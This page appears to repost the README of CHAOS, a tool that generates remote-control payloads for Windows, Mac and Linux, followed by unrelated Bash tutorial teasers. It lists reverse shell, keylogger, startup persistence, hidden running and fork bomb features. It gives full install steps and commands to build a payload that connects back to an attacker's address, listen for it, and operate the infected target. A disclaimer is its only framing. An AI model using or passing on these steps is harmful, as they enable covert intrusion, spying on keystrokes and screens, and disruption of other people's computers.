CHAOS is a PoC that allow generate payloads and control remote operating systems.
Features
| Feature | Windows | Mac | Linux |
|---|---|---|---|
Reverse Shell | X | X | X |
Download File | X | X | X |
Upload File | X | X | X |
Screenshot | X | X | X |
Keylogger | X | ||
Persistence | X | ||
Open URL | X | X | X |
Get OS Info | X | X | X |
Fork Bomb | X | X | X |
Run Hidden | X |
Also Read – Osmedeus : Fully Automated Offensive Security Tool for Reconnaissance & Vulnerability Scanning
How to Install
Install dependencies
$ sudo apt install golang git -y
Get this repository
$ go get github.com/tiagorlampert/CHAOS
Get external golang dependencies (ARE REQUIRED GET ALL DEPENDENCIES)
$ go get github.com/kbinani/screenshot
$ go get github.com/lxn/win
$ go get github.com/matishsiao/goInfo
$ go get golang.org/x/sys/windows
Maybe you will see the message “package github.com/lxn/win: build constraints exclude all Go files”.
It’s occurs because the libraries are to windows systems, but it necessary to build the payload.
Go into the repository
$ cd ~/go/src/github.com/tiagorlampert/CHAOS
Run
$ go run main.go
How to Use?
| Command | On HOST does… |
|---|---|
generate | Generate a payload (e.g. generate lhost=192.168.0.100 lport=8080 fname=chaos --windows) |
lhost= | Specify a ip for connection |
lport= | Specify a port for connection |
fname= | Specify a filename to output |
--windows | Target Windows |
--macos | Target Mac OS |
--linux | Target Linux |
listen | Listen for a new connection (e.g. listen lport=8080) |
serve | Serve files |
exit | Quit this program |
| Command | On TARGET does… |
|---|---|
download | File Download |
upload | File Upload |
screenshot | Take a Screenshot |
keylogger_start | Start Keylogger session |
keylogger_show | Show Keylogger session logs |
persistence_enable | Install at Startup |
persistence_disable | Remove from Startup |
getos | Get OS name |
lockscreen | Lock the OS screen |
openurl | Open the URL informed |
bomb | Run Fork Bomb |
clear | Clear the Screen |
back | Close connection but keep running on target |
exit | Close connection and exit on target |
Demo Video
Disclaimer
THIS SOFTWARE IS PROVIDED “AS IS” WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.
Introduction Bash scripting is a powerful way to automate Linux tasks, but writing a script…
Introduction A self-signed SSL certificate is a certificate that is created and signed by the…
Introduction Debugging is an important part of Bash scripting. When a script does not work…
Introduction Cron jobs are used in Linux to run commands or Bash scripts automatically at…
Introduction Pipes are an important feature in Linux and Bash scripting. A pipe allows you…
Introduction The grep, awk, and sed commands are powerful text-processing tools in Linux. They are…